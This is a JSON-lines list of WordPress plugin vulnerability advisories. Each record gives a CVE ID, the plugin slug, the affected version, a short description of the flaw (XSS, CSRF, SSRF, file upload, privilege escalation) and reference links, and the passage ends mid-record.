{"CVE_ID":"CVE-2023-3957","slug":"navz-photo-gallery","versionImpact":"1.9","description":"The ACF Photo Gallery Field plugin for WordPress is vulnerable to unauthorized modification of data due to an insufficient restriction on the 'apg_profile_update' function in versions up to, and including, 1.9. This makes it possible for authenticated attackers, with subscriber-level permissions or above, to update the user metas arbitrarily. The meta value can only be a string.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/navz-photo-gallery\\\/tags\\\/1.9\\\/includes\\\/acf_photo_gallery_save.php#L42\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/navz-photo-gallery\\\/tags\\\/1.9\\\/includes\\\/acf_photo_gallery_save.php#L42\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2943404\\\/navz-photo-gallery#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2943404\\\/navz-photo-gallery#file0\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/689511e0-1355-4fcb-8a72-d819abc8e9a3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/689511e0-1355-4fcb-8a72-d819abc8e9a3?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1218","slug":"kali-forms","versionImpact":"2.3.41","description":"The Contact Form builder with drag & drop for WordPress \u2013 Kali Forms plugin for WordPress is vulnerable to unauthorized access and modification of data via API due to an inconsistent capability check on several REST endpoints in all versions up to, and including, 2.3.41. This makes it possible for authenticated attackers, with contributor access and higher, to obtain access to or modify forms or entries.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed1aae32-6040-4c42-b8a7-4c3be371a8c0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed1aae32-6040-4c42-b8a7-4c3be371a8c0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3036466\\\/kali-forms\\\/trunk?contextall=1&old=3029334&old_path=%2Fkali-forms%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3036466\\\/kali-forms\\\/trunk?contextall=1&old=3029334&old_path=%2Fkali-forms%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1416","slug":"lead-form-builder","versionImpact":"1.8.9","description":"The Responsive Contact Form Builder & Lead Generation Plugin plugin for WordPress is vulnerable to unauthorized access to functionality due to a missing capability check on several functions in all versions up to, and including, 1.8.9. This makes it possible for unauthenticated attackers to invoke those functions.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d087957c-0dd5-46a9-a6bc-85f2f79f43bd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d087957c-0dd5-46a9-a6bc-85f2f79f43bd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-form-builder\\\/trunk\\\/inc\\\/ajax-functions.php#L674\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-form-builder\\\/trunk\\\/inc\\\/ajax-functions.php#L674\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-form-builder\\\/trunk\\\/inc\\\/ajax-functions.php#L21\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-form-builder\\\/trunk\\\/inc\\\/ajax-functions.php#L21\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-form-builder\\\/trunk\\\/inc\\\/lf-install.php#L57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-form-builder\\\/trunk\\\/inc\\\/lf-install.php#L57\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5656","slug":"google-cse","versionImpact":"1.0.7","description":"The Google CSE plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.0.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/37cf63e3-9301-441d-9852-b2de83078b51?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/37cf63e3-9301-441d-9852-b2de83078b51?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/adc6ea6d-29d8-4ad0-b0db-2540e8b3f9a9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/adc6ea6d-29d8-4ad0-b0db-2540e8b3f9a9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7822","slug":"quick-code","versionImpact":"1.0","description":"The Quick Code WordPress plugin through 1.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3a5bdd7e-7dd5-4749-9fad-ff4d7df20273\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3a5bdd7e-7dd5-4749-9fad-ff4d7df20273\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8519","slug":"ultimate-member","versionImpact":"2.8.6","description":"The Ultimate Member \u2013 User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'um_loggedin' shortcode in all versions up to, and including, 2.8.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e394bb2-d505-4bf1-b672-fea3504bf936?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e394bb2-d505-4bf1-b672-fea3504bf936?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/7b8a7a7c039bde4539c07e049b19036192f1c133\\\/includes\\\/core\\\/class-shortcodes.php#L433\",\"name\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/7b8a7a7c039bde4539c07e049b19036192f1c133\\\/includes\\\/core\\\/class-shortcodes.php#L433\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-member\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-member\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/pull\\\/1545\",\"name\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/pull\\\/1545\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3160947\\\/ultimate-member\\\/tags\\\/2.8.7\\\/includes\\\/core\\\/class-shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3160947\\\/ultimate-member\\\/tags\\\/2.8.7\\\/includes\\\/core\\\/class-shortcodes.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10510","slug":"adbuddy-adblocker-detection","versionImpact":"1.1.3","description":"The adBuddy+ (AdBlocker Detection) by NetfunkDesign WordPress plugin through 1.1.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca499752-b516-42e7-8c2f-18e4428a92c7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca499752-b516-42e7-8c2f-18e4428a92c7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9698","slug":"crafthemes-demo-import","versionImpact":"3.3","description":"The Crafthemes Demo Import plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'process_uploaded_files' function in all versions up to, and including, 3.3. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crafthemes-demo-import\\\/trunk\\\/inc\\\/Helpers.php#L421\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crafthemes-demo-import\\\/trunk\\\/inc\\\/Helpers.php#L421\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e44dd0e8-e6e7-4a2d-b9ca-abd1de273092?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e44dd0e8-e6e7-4a2d-b9ca-abd1de273092?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12324","slug":"unilevel-mlm-plan","versionImpact":"1.1.0","description":"The Unilevel MLM Plan plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018page\u2019 parameter in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unilevel-mlm-plan\\\/trunk\\\/includes\\\/admin\\\/settings\\\/view\\\/ump-epins-list.php#L81\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unilevel-mlm-plan\\\/trunk\\\/includes\\\/admin\\\/settings\\\/view\\\/ump-epins-list.php#L81\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe71e2b9-ddd7-4d6d-97e5-5fad41f8f35c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe71e2b9-ddd7-4d6d-97e5-5fad41f8f35c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13225","slug":"ect-homepage-products","versionImpact":"1.9","description":"The ECT Home Page Products WordPress plugin through 1.9 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8efd7d62-3f74-4108-970e-bd5ed24914ff\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8efd7d62-3f74-4108-970e-bd5ed24914ff\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13757","slug":"master-slider","versionImpact":"3.10.6","description":"The Master Slider \u2013 Responsive Touch Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ms_layer shortcode in all versions up to, and including, 3.10.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-slider\\\/trunk\\\/includes\\\/msp-shortcodes.php#L815\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-slider\\\/trunk\\\/includes\\\/msp-shortcodes.php#L815\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/master-slider\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/master-slider\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26a7fb51-f40d-46b8-9f52-495716032a1b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26a7fb51-f40d-46b8-9f52-495716032a1b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2109","slug":"wp-compress-image-optimizer","versionImpact":"6.30.15","description":"The WP Compress \u2013 Instant Performance & Speed Optimization plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 6.30.15 via the init() function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query information from internal services.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-compress-image-optimizer\\\/tags\\\/6.30.15\\\/wp-compress-core.php#L994\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-compress-image-optimizer\\\/tags\\\/6.30.15\\\/wp-compress-core.php#L994\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3254259\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3254259\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-compress-image-optimizer\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-compress-image-optimizer\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10b9d703-de9d-472a-bdfb-bc9a41bf375e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10b9d703-de9d-472a-bdfb-bc9a41bf375e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5122","slug":"map-block-leaflet","versionImpact":"3.2.1","description":"The Map Block Leaflet plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018url\u2019 parameter in all versions up to, and including, 3.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/map-block-leaflet\\\/trunk\\\/build\\\/leaflet-map-block\\\/render.php#L41\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/map-block-leaflet\\\/trunk\\\/build\\\/leaflet-map-block\\\/render.php#L41\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3302407\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3302407\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/map-block-leaflet\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/map-block-leaflet\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/372f1cf3-df33-444c-b31e-8f71d128e30b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/372f1cf3-df33-444c-b31e-8f71d128e30b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3848","slug":"smartpay","versionImpact":"2.7.13","description":"The Download Manager and Payment Form WordPress Plugin \u2013 WP SmartPay plugin for WordPress is vulnerable to privilege escalation via account takeover in versions 1.1.0 to 2.7.13. This is due to the plugin not properly validating a user's identity prior to updating their email through the update() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change arbitrary user's email addresses, including administrators, and leverage that to reset the user's password and gain access to their account.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smartpay\\\/tags\\\/2.7.13\\\/app\\\/Http\\\/Controllers\\\/Rest\\\/CustomerController.php#L51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smartpay\\\/tags\\\/2.7.13\\\/app\\\/Http\\\/Controllers\\\/Rest\\\/CustomerController.php#L51\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c197e26f-745b-481a-a7b5-79d1211c02ea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c197e26f-745b-481a-a7b5-79d1211c02ea?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-46848","slug":"visualizer","versionImpact":"3.9.1","description":"Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in Themeisle Visualizer: Tables and Charts Manager for WordPress plugin <= 3.9.1 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/visualizer\\\/wordpress-visualizer-tables-and-charts-manager-for-wordpress-plugin-3-9-2-auth-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/visualizer\\\/wordpress-visualizer-tables-and-charts-manager-for-wordpress-plugin-3-9-2-auth-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2549","slug":"feather-login-page","versionImpact":"1.1.1","description":"The Feather Login Page plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions starting from 1.0.7 up to, and including, 1.1.1. This is due to missing nonce validation in the 'createTempAccountLink' function. This makes it possible for unauthenticated attackers to create a new user with administrator role via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. An attacker can leverage CVE-2023-2545 to get the login link or request a password reset to the new user's email address.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12560b8e-9c47-4f7f-ac9c-d86f17914ba3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12560b8e-9c47-4f7f-ac9c-d86f17914ba3?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/feather-login-page\\\/trunk\\\/features\\\/inc\\\/admin\\\/expirable-login-link.php?rev=2612332#L206\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/feather-login-page\\\/trunk\\\/features\\\/inc\\\/admin\\\/expirable-login-link.php?rev=2612332#L206\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3295","slug":"unlimited-elements-for-elementor","versionImpact":"1.5.66","description":"The Unlimited Elements For Elementor (Free Widgets, Addons, Templates) for WordPress is vulnerable to arbitrary file uploads due to missing file type validation of files in the file manager functionality in versions up to, and including, 1.5.66 . This makes it possible for authenticated attackers, with contributor-level permissions and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. The issue was partially patched in version 1.5.66 and fully patched in 1.5.67","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/unitecreator_assets.class.php#L1005\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/unitecreator_assets.class.php#L1005\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce1ac711-6026-49ef-b66b-2cc199697942?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce1ac711-6026-49ef-b66b-2cc199697942?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3956","slug":"instawp-connect","versionImpact":"0.0.9.18","description":"The InstaWP Connect plugin for WordPress is vulnerable to unauthorized access of data, modification of data and loss of data due to a missing capability check on the 'events_receiver' function in versions up to, and including, 0.0.9.18. This makes it possible for unauthenticated attackers to add, modify or delete post and taxonomy, install, activate or deactivate plugin, change customizer settings, add or modify or delete user including administrator user.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/instawp-connect\\\/tags\\\/0.0.9.18\\\/includes\\\/class-instawp-rest-apis.php#L103\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/instawp-connect\\\/tags\\\/0.0.9.18\\\/includes\\\/class-instawp-rest-apis.php#L103\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2942363\\\/instawp-connect#file5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2942363\\\/instawp-connect#file5\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48e7acf2-61d4-4762-8657-0701910ce69b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48e7acf2-61d4-4762-8657-0701910ce69b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1217","slug":"kali-forms","versionImpact":"2.3.41","description":"The Contact Form builder with drag & drop for WordPress \u2013 Kali Forms plugin for WordPress is vulnerable to unauthorized plugin deactivation due to a missing capability check on the await_plugin_deactivation function in all versions up to, and including, 2.3.41. This makes it possible for authenticated attackers, with subscriber access or higher, to deactivate any active plugins.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7be75b0a-737d-4f0d-b024-e207af4573cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7be75b0a-737d-4f0d-b024-e207af4573cd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3036466\\\/kali-forms\\\/trunk?contextall=1&old=3029334&old_path=%2Fkali-forms%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3036466\\\/kali-forms\\\/trunk?contextall=1&old=3029334&old_path=%2Fkali-forms%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1415","slug":"lead-form-builder","versionImpact":"1.8.9","description":"The Responsive Contact Form Builder & Lead Generation Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.8.9. This is due to missing or incorrect nonce validation on several functions. This makes it possible for unauthenticated attackers to invoke those functions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. These actions may result in form deletion, and lead signup as well as file upload.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d8ce9ab4-d6d6-4e06-a042-145db02cf7ba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d8ce9ab4-d6d6-4e06-a042-145db02cf7ba?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-form-builder\\\/trunk\\\/inc\\\/ajax-functions.php#L674\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-form-builder\\\/trunk\\\/inc\\\/ajax-functions.php#L674\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-form-builder\\\/trunk\\\/inc\\\/ajax-functions.php#L21\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-form-builder\\\/trunk\\\/inc\\\/ajax-functions.php#L21\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-form-builder\\\/trunk\\\/inc\\\/lf-install.php#L57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-form-builder\\\/trunk\\\/inc\\\/lf-install.php#L57\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5663","slug":"bb-bootstrap-cards","versionImpact":"1.1.3","description":"The Cards for Beaver Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Cards widget in all versions up to, and including, 1.1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/55ff923e-9d04-4ce7-b6d6-165fa4fc5433?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/55ff923e-9d04-4ce7-b6d6-165fa4fc5433?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bb-bootstrap-cards\\\/trunk\\\/bb-bootstrap-cards-module\\\/includes\\\/frontend.php#L13\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bb-bootstrap-cards\\\/trunk\\\/bb-bootstrap-cards-module\\\/includes\\\/frontend.php#L13\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bb-bootstrap-cards\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bb-bootstrap-cards\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3099081%40bb-bootstrap-cards&new=3099081%40bb-bootstrap-cards&sfp_email=&sfph_mail=#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3099081%40bb-bootstrap-cards&new=3099081%40bb-bootstrap-cards&sfp_email=&sfph_mail=#file4\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6054","slug":"auto-featured-image","versionImpact":"1.2","description":"The Auto Featured Image plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'create_post_attachment_from_url' function in all versions up to, and including, 1.2. This makes it possible for authenticated attackers, with contributor-level and above permissions, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a 